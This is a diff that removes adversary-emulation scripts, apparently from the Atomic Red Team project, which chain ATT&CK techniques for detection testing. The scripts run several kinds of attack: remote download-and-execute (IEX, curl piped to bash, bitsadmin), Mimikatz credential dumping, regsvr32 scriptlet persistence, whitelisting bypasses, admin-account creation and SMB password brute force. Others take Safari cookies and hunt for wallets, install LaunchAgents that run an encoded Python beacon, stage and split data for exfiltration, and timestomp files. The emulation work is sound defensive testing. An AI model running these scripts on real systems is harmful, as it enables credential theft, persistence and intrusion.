ARTifacts/Chain_Reactions/atomic-hello.c

@@ -1,11 +0,0 @@
-#include <stdio.h> 
- 
-
-//  Simple Hello World for Atomic Red Team payload
-
-int main() { 
-  
-           printf("Hello from Atomic Red Team! \n"); 
-               
-           return 0; 
-}

ARTifacts/Chain_Reactions/atomic-hello.cs

@@ -1,13 +0,0 @@
-using System;
-
-// C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe atomic-hello.cs
-// Expected Output:  Hello from Atomic Red Team! \n Press Enter To Close.
-
-public class Program
-{
-    public static void Main()
-    {
-        Console.WriteLine("Hello from Atomic Red Team! \n Press Enter To Close.");
-        Console.ReadLine();
-    }
-}

ARTifacts/Chain_Reactions/chain_reaction_Argonaut.ps1

@@ -1,19 +0,0 @@
-# Chain Reaction: Argonaut
-# Tactics: Execution:Powershell, Discovery
-
-# variable can be changed to $userprofile to drop the bat elsewhere
-# TEMP=C:\Users\<username>\AppData\Local\Temp
-$temp = $env:temp
-
-# Note that these are alias' for Invoke-WebRequest.
-# The concept is to see how curl and wget look in you detection tools vs what is commonly used (IWR, Invoke-WebRequest, etc)
-
-wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\1.bat
-
-# Alternate Ending: Using curl
-
-curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\2.bat
-
-# Execute the 1.bat file
-
-cmd.exe /c $temp\1.bat

ARTifacts/Chain_Reactions/chain_reaction_Cyclotron.bat

@@ -1,29 +0,0 @@
-::Chain Reaction - Cyclotron
-::
-:: In this test we will executing a binary multiple ways.
-:: Some of these are Application Whitelisting Bypasses
-:: Either Clone the Repo, or Download the AllTheThings DLL Somehow ;-)
-
-
-REM X86
-Executing X86 AllTheThings Test
-C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx86.dll
-C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThingsx86.dll
-C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThingsx86.dll
-regsvr32.exe /s /u AllTheThingsx86.dll
-regsvr32.exe /s AllTheThingsx86.dll
-rundll32 AllTheThingsx86.dll,EntryPoint
-odbcconf.exe  /s /a { REGSVR AllTheThingsx86.dll }
-regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx86.dll
-
-
-REM AMD64
-
-C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx64.dll
-C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThingsx64.dll
-C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThingsx64.dll
-regsvr32.exe /s /u AllTheThingsx64.dll
-regsvr32.exe /s AllTheThingsx64.dll
-rundll32 AllTheThingsx64.dll,EntryPoint
-odbcconf.exe  /s /a { REGSVR AllTheThingsx64.dll }
-regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx64.dll

ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat

@@ -1,42 +0,0 @@
-:: Adversary Group: https://attack.mitre.org/wiki/Group/G0050
-:: xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
-:: Thanks to Nick Carr for his research on this group
-:: Sample Representation of ATT&CK Techniques used by APT32
-:: Tactics: Execution, Persistence, Privilege Escalation
-
-
-:: Tactic: Privilege Escalation / Execution
-:: Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
-:: Create Scheduled Task With RegSv32 Payload
-
-SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
-
-SCHTASKS /Run /TN "Atomic Testing"
-
-SCHTASKS /Delete /TN "Atomic Testing" /F
-
-:: Tactics: Execution
-:: Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
-
-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
-
-:: Tactics: Defense Evasion
-:: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
-:: Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
-:: To Encode A Command
-:: $Text = '$file=(gi test.txt);$date=''7/16/1945 5:29am'';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date'
-:: $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
-:: $EncodedText =[Convert]::ToBase64String($Bytes)
-:: $EncodedText
-
-echo "Atomic Test File" > test.txt
-
-::PowerShell.exe -com {$file=(gi test.txt);$date = '7/16/1945 5:29am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
-
-PowerShell.exe -enc JABmAGkAbABlAD0AKABnAGkAIAB0AGUAcwB0AC4AdAB4AHQAKQA7ACQAZABhAHQAZQA9ACcANwAvADEANgAvADEAOQA0ADUAIAA1ADoAMgA5AGEAbQAnADsAJABmAGkAbABlAC4ATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEwAYQBzAHQAQQBjAGMAZQBzAHMAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEMAcgBlAGEAdABpAG8AbgBUAGkAbQBlAD0AJABkAGEAdABlAA==
-
-:: Tactics: Defense Evasion
-:: technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
-
-:: Deletes File, detection here would be File Modification
-::del test.txt

ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1

@@ -1,37 +0,0 @@
-# Adversary Group: https://attack.mitre.org/wiki/Group/G0050
-# xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
-# Thanks to Nick Carr for his research on this group
-# Sample Representation of ATT&CK Techniques used by APT32
-# Tactics: Execution, Persistence, Privilege Escalation
-
-
-# Tactic: Privilege Escalation / Execution
-# Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
-# Create Scheduled Task With RegSv32 Payload
-
-SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
-
-SCHTASKS /Run /TN "Atomic Testing"
-
-SCHTASKS /Delete /TN "Atomic Testing" /F
-
-# Tactics: Execution
-# Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
-
-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
-
-# Tactics: Defense Evasion
-# Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
-# Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
-
-$test = "Atomic Test File"
-set-content -path test.txt -value $test
-$file=(gi test.txt);$date='7/16/1945 5:29 am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date
-
-# Tactics: Defense Evasion
-# technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
-
-# Deletes File, detection here would be File Modification
-del test.txt
-
-Write-Host "Done" -Fore Green

ARTifacts/Chain_Reactions/chain_reaction_Fission.bat

@@ -1,56 +0,0 @@
-:: Chain Reaction - Fission
-::
-:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
-:: NOTE We recommend executing from a server that you control.
-:: NOTE Thank You :)
-::
-:: This particular Chain Reaction focuses on Discovery.
-
-:: Tactic: Discovery
-:: Technique: Remote System Discovery https://attack.mitre.org/wiki/Technique/T1018
-:: Change IP scheme for your environment
-
-:: for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i > ping_output.txt
-
-net.exe view
-
-net.exe view /domain
-
-:: Tactic: Discovery
-:: Technique: Account Discovery https://attack.mitre.org/wiki/Windows_Technique_Matrix
-
-net localgroup "administrators"
-
-wmic useraccount get /ALL
-
-
-:: Tactic: Discovery
-:: Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
-
-netsh.exe advfirewall firewall show all profiles
-
-tasklist.exe | findstr cb
-
-tasklist.exe | findstr virus
-
-tasklist.exe | findstr defender
-
-:: Execution
-
-:: Tactic: Discovery
-:: Technique: System Network Configuration Discovery https://attack.mitre.org/wiki/Technique/T1016
-
-ipconfig /all
-arp -a
-nbtstat -n
-
-:: Tactic: Discovery
-:: Technique: File and Directory Discovery https://attack.mitre.org/wiki/Technique/T1083
-
-dir /s c:\ >> %temp%\download
-
-:: Tactic: Execution
-:: Technique: Powershell https://attack.mitre.org/wiki/Technique/T1086
-:: Download and invoke BloodHound Ingestor
-
-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-BloodHoundData"

ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat

@@ -1,33 +0,0 @@
-:: Chain Reaction 01
-::
-:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
-:: NOTE We recommend executing from a server that you control.
-:: NOTE Thank You :)
-:: This particular Chain Reaction focuses on generating event noise.
-
-:: Tactics: Persistence, Defense Evasion
-:: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
-:: RegSvr32 https://attack.mitre.org/wiki/Technique/T1117
-:: This particular technique will reach out to the github repository (network) and spawn calc (process) every 30 minutes.
-
-SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
-
-:: Tactic: Discovery
-:: Execution: https://attack.mitre.org/wiki/Technique/T1086
-:: Have PowerShell download the Discovery.bat, output to a local file (for review later)
-
-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > output.txt
-
-:: Tactic: Credential Access
-:: Technique: Create Account https://attack.mitre.org/wiki/Technique/T1136
-:: Add a user, then add to group
-
-Net user /add Trevor SmshBgr123
-
-:: Add user to group
-
-net localgroup administrators Trevor /add
-
-ECHO Well that was fun!
-
-pause

ARTifacts/Chain_Reactions/chain_reaction_Ranger.sh

@@ -1,105 +0,0 @@
-#!/bin/sh
-
-# Chain Reaction Ranger
-# NOTE it is a BAD idea to execute scripts from a repo that you do not control.
-# NOTE We recommend executing from a server that you control.
-# NOTE Thank You :)
-# This particular Chain Reaction focuses on simulating reconnaisance and staging files for exfiltration
-
-# Tactic: Collection
-# Technique: Data Staged https://attack.mitre.org/wiki/Technique/T1074
-# Tactic: Defense Evasion
-# Technique: Hide Artifacts: Hidden Files and Directories https://attack.mitre.org/techniques/T1564/001/
-# Create a hidden directory to store our collected data in
-
-mkdir -p /tmp/.staging_art/
-mkdir -p /tmp/.exfil/
-
-# Tactic: Discovery
-# Technique: System Information Discovery https://attack.mitre.org/wiki/Technique/T1082
-# Determine Platform and Gather System Information
-
-SYSINF=/tmp/.staging_art/system.txt
-MACCHECK="$(sw_vers -productName | cut -d ' ' -f1)"
-
-if [[ "$MACCHECK" == "Mac" ]]; then
-  PLAT="Mac"
-else
-  PLAT="Linux"
-fi
-
-echo "Testing: Platform is" $PLAT
-
-echo "Platform: " $PLAT >> $SYSINF
-echo "Kernel:" >> $SYSINF && uname -a >> $SYSINF
-
-echo "Testing: Gathering General Release Information"
-
-if [ "$PLAT" = "Mac" ]; then
-  echo "Testing: Gathering macOS Release Information"
-  echo "System Profiler:" >> $SYSINF
-  system_profiler >> $SYSINF 2> /dev/null
-else
-  echo "Testing: Gathering Linux Release Information"
-  echo "Release:" >> $SYSINF
-  lsb_release >> $SYSINF 2> /dev/null
-fi
-
-# Tactic: Discovery
-# Technique: Account Discovery https://attack.mitre.org/wiki/Technique/T1087
-# Collect User Account Information
-
-USERINF=/tmp/.staging_art/users.txt
-
-echo "Testing: Gathering User Information"
-
-echo "Whoami:" >> $USERINF && whoami >> $USERINF
-echo "Current User Activity:" >> $USERINF && w >> $USERINF 2> /dev/null
-echo "Sudo Privs" >> $USERINF && sudo -l -n >> $USERINF 2> /dev/null
-echo "Sudoers" >> $USERINF && cat /etc/sudoers >> $USERINF 2> /dev/null
-echo "Last:" >> $USERINF && last >> $USERINF 2> /dev/null
-
-if [ "$PLAT" == "Mac" ]; then
-  echo "Testing: Gathering Mac Group Information"
-  echo "Group Information:" >> $USERINF
-  dscl . list /Groups >> $USERINF
-  dscacheutil -q group >> $USERINF
-else
-  echo "Testing: Gathering Linux Group Information"
-  echo "Group Information:" >> $USERINF
-  cat /etc/passwd >> $USERINF
-  echo "Elevated Users" >> $USERINF && grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' >> $USERINF
-fi
-
-# Tactic: Discovery
-# Technique: Software Discovery: Security Software Discovery https://attack.mitre.org/techniques/T1518/001/
-# Check for common security Software
-
-SECINF=/tmp/.staging_art/security.txt
-
-echo "Testing: Gathering Security Software Information"
-
-echo "Running Security Processes" >> $SECINF && ps ax | grep -v grep | grep -e Carbon -e Snitch -e OpenDNS -e RTProtectionDaemon -e CSDaemon -e cma >> $SECINF
-
-# Tacttic: Exfiltration
-# Technique:  Archive Collected Data: Archive via Library https://attack.mitre.org/techniques/T1560/002/
-# Compress and encrypt all collected data
-
-echo "Testing: Zip up the Recon"
-zip --password "Hope You Have Eyes on This!!" /tmp/.staging_art/loot.zip /tmp/.staging_art/* > /dev/null 2>&1
-
-# Tacttic: Exfiltration
-# Technique: Data Transfer Size Limits https://attack.mitre.org/wiki/Technique/T1030
-# Split the file up into 23 byte chunks for easier exfiltration
-
-echo "Testing: Split the file for Exfil"
-split -a 15 -b 23 "/tmp/.staging_art/loot.zip" "/tmp/.exfil/loot.zip.part-"
-
-# Tactic: Defense Evasion
-# Technique: Delete File Indicator Removal on Host: File Deletion https://attack.mitre.org/techniques/T1070/004/
-# Delete evidence
-
-rm -rf /tmp/.staging_art/
-
-# Optionally, delete exfil directory to clean up
-# rm -rf /tmp/.exfil/

ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat

@@ -1,49 +0,0 @@
-:: Chain Reaction - Reactor
-::
-::
-
-:: Tactic: Discovery
-:: Technique: System Owner/User Discovery: https://attack.mitre.org/wiki/Technique/T1033
-
-:: Single Endpoint
-
-:: for /F "tokens=1,2" %%i in ('qwinsta /server:<COMPUTERNAME> ^| findstr "Active Disc"') do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
-
-:: Multiple Endpoints
-
-@FOR /F %%n in (computers.txt) DO @FOR /F "tokens=1,2" %%i in ('qwinsta /server:%%n ^| findstr "Active Disc"’) do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
-
-
-:: Tactic: Credential Access, Lateral Movement
-:: Technique: Brute Force: https://attack.mitre.org/wiki/Technique/T1110
-:: Technique: Windows Admin Shares: https://attack.mitre.org/wiki/Technique/T1077
-
-@FOR /F %%n in (usernames.txt) DO @FOR /F %%p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%%n %%p 1>NUL 2>&1 && @echo [*] %%n:%%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
-
-
-:: Tactic: Discovery
-:: Technique: Security Software Discovery: https://attack.mitre.org/wiki/Technique/T1063
-
-netsh.exe advfirewall firewall show rule name=all
-
-tasklist.exe | findstr cb
-
-tasklist.exe | findstr virus
-
-tasklist.exe | findstr defender
-
-:: Tactic: Execution, Discovery
-:: Technique: PowerShell: https://attack.mitre.org/wiki/Technique/T1086
-:: Technique: Multiple Discovery
-
-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
-
-:: Tactic: Collection
-:: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119
-
-for /R c: %%f in (*.docx) do copy %%f c:\temp\
-
-:: Tactic: Exfiltration
-:: Technique: Data Compressed: https://attack.mitre.org/wiki/Technique/T1002
-
-cmd.exe /c powershell.exe Compress-Archive -Path C:\temp\* -CompressionLevel Optimal -DestinationPath C:\temp\allthedataz.zip

ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist

@@ -1,16 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-<key>Label</key>
-<string>cookie-miner-backdoor-launchagent.plist</string>
-<key>ProgramArguments</key>
-<array>
-<string>python</string>
-<string>-c</string>
-<string>import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'));</string>
-</array>
-<key>RunAtLoad</key>
-<true/>
-</dict>
-</plist>

ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist

@@ -1,14 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
-	<key>ProgramArguments</key>
-	<array>
-		<string>/Users/Shared/xmrig2</string>
-	</array>
-	<key>RunAtLoad</key>
-	<true/>
-	<key>Label</key>
-	<string>cookie-miner-payload-launchagent.plist</string>
-</dict>
-</plist>

ARTifacts/Chain_Reactions/cookie-miner-stage-01.sh

@@ -1,49 +0,0 @@
-#! /bin/bash
-
-#   Tactic: Discovery
-#   Technique: T1033 - System Owner/User Discovery
-OUTPUT="$(id -un)"
-
-#   Tactic: Collection
-#   Technique: T1005 - Data from Local System
-cd ~/Library/Cookies
-grep -q "coinbase" "Cookies.binarycookies"
-
-#   Tactic: Collection
-#   Technique: T1074 - Data Staged
-mkdir ${OUTPUT}
-cp Cookies.binarycookies ${OUTPUT}/Cookies.binarycookies
-
-#   Tactic: Exfiltration
-#   Technique: T1560.002 - Archive Collected Data: Archive via Library
-zip -r interestingsafaricookies.zip ${OUTPUT}
-
-#   Tactic: Exfiltration
-#   Technique: T1048.002 - Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
-#   Simulate network connection for exfiltration
-curl https://atomicredteam.io > /dev/null
-
-curl --silent https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py | python - ``
-
-#   Tactic: Discovery
-#   Technique: T1083 - File and Directory Discovery
-find ~ -name "*wallet*" > interestingfiles.txt
-cp interestingfiles.txt ${OUTPUT}/interestingfiles.txt
-
-#   Tactic: Persistence
-#   Technique: T1543.001 - Create or Modify System Process: Launch Agent
-mkdir -p ~/Library/LaunchAgents
-cd ~/Library/LaunchAgents
-curl --silent -o com.apple.rig2.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
-curl --silent -o com.proxy.initialize.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
-launchctl load -w com.apple.rig2.plist
-launchctl load -w com.proxy.initialize.plist
-
-
-cd /Users/Shared
-curl --silent -o xmrig2 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.macos
-
-#   Tactic: Defense Evasion
-#   Technique: T1222.002 - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification
-chmod +x ./xmrig2
-./xmrig2

ARTifacts/Chain_Reactions/cookie-miner-stage-02.py

@@ -1,25 +0,0 @@
-# import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
-# ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
-# out = ps.stdout.read()
-# ps.stdout.close()
-# if re.search("Little Snitch", out):
-#    sys.exit()
-# import urllib2;
-# UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://atomicredteam.io';t='/news.php';req=urllib2.Request(server+t);
-# req.add_header('User-Agent',UA);
-# req.add_header('Cookie',"session=BmHiW7UA/sf9C279oE2owK9LZ0c=");
-# proxy = urllib2.ProxyHandler();
-# o = urllib2.build_opener(proxy);
-# urllib2.install_opener(o);
-# a=urllib2.urlopen(req).read();
-
-# Tactic: Defense Evasion
-# Technique: T1140 - Deobfuscate/Decode Files or Information
-#
-# Tactic: Discovery
-# Technique: T1057 - Process Discovery
-#
-# Tactic: Command and Control
-# Technique: T1071.001 - Application Layer Protocol: Web Protocols
-#
-import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'))

ARTifacts/Chain_Reactions/dragonstail_benign.ps1

@@ -1,37 +0,0 @@
-# Adversary Group: https://attack.mitre.org/wiki/Group/G0050
-# xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
-# Thanks to Nick Carr for his research on this group
-# Sample Representation of ATT&CK Techniques used by APT32
-# Tactics: Execution, Persistence, Privilege Escalation
-
-
-# Tactic: Privilege Escalation / Execution
-# Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
-# Create Scheduled Task With RegSv32 Payload
-
-SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
-
-SCHTASKS /Run /TN "Atomic Testing"
-
-SCHTASKS /Delete /TN "Atomic Testing" /F
-
-# Tactics: Execution
-# Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
-
-# powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
-
-# Tactics: Defense Evasion
-# Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
-# Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
-
-$test = "Atomic Test File"
-set-content -path test.txt -value $test
-$file=(gi test.txt);$date='7/16/1945 5:29 am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date
-
-# Tactics: Defense Evasion
-# technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
-
-# Deletes File, detection here would be File Modification
-del test.txt
-
-Write-Host "Done" -Fore Green

ARTifacts/Chain_Reactions/mirai-reaction-stage-01.sh

@@ -1,17 +0,0 @@
-#! /bin/bash
-
-cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
-
-#   Tactic: Discovery
-#   Technique: T1082 - System Information discovery
-MIRAI_EXT=`uname -m`
-wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O mirai.$MIRAI_EXT
-
-#   Tactic: Defense Evasion
-#   Technique: T1222 - File Permissions Modification
-chmod +x mirai.$MIRAI_EXT
-./mirai.$MIRAI_EXT
-
-#   Tactic: Defense Evasion
-#   Technique: T1107 - File Deletion
-rm -rf mirai.$MIRAI_EXT

ARTifacts/Chain_Reactions/qbot_infection_reaction.vbs

@@ -1,34 +0,0 @@
-On Error Resume Next
-
-' Properly declare everything
-Dim shell, remoteFile, wmi_os_caption, securityCenterWMI, avItems, fso, localFile, bitsadminReturn, objProcess
-
-Set shell = WScript.CreateObject("WScript.Shell")
-
-'   Tactic: Discovery
-'   Technique: T1082 - System Information Discovery
-Set wmi_os_caption = shell.Exec("wmic OS get Caption /value")
-
-'   Tactic: Discovery
-'   Technique: T1518.001 - Software Discovery: Security Software Discovery
-Set securityCenterWMI = GetObject("winmgmts:\\.\root\SecurityCenter2")
-Set avItems = securityCenterWMI.ExecQuery("Select * From AntiVirusProduct")
-
-Set fso = CreateObject("Scripting.FileSystemObject")
-localFile = fso.GetSpecialFolder(2) & "\Atomic_Qbot.exe"
-
-'   Tactic: Command and Control
-'   Technique: T1105 - Ingress Tool Transfer
-bitsadminReturn = shell.Run("bit"&"sadmin /transfer qcxjb" & Second(Now) & " /Priority HIGH " & "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.exe " & localFile, 0, True)
-
-'   Tactic: Defense Evasion
-'   Technique: T1036 - Masquerading
-MsgBox "The file can't be opened because there are problems with the content.", 0, "Microsoft Word"
-
-'   Tactic: Execution
-'   Technique: T1047 - Windows Management Instrumentation
-If (bitsadminReturn = 0) And (fso.FileExists(localFile)) Then
-    Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
-
-    objProcess.Create localFile
-End If

ARTifacts/Chain_Reactions/rocke-and-roll-stage-01.sh

@@ -1,10 +0,0 @@
-#! /bin/bash
-
-#   Tactic: Defense Evasion
-#   Technique: T1027 - Obfuscated Files or Information
-bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh)|base64 -d |/bin/bash"
-
-# If you want to skip the base64 process, uncomment the following line:
-# bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|/bin/bash"
-
-echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 01" >> /tmp/atomic.log

ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh

@@ -1,81 +0,0 @@
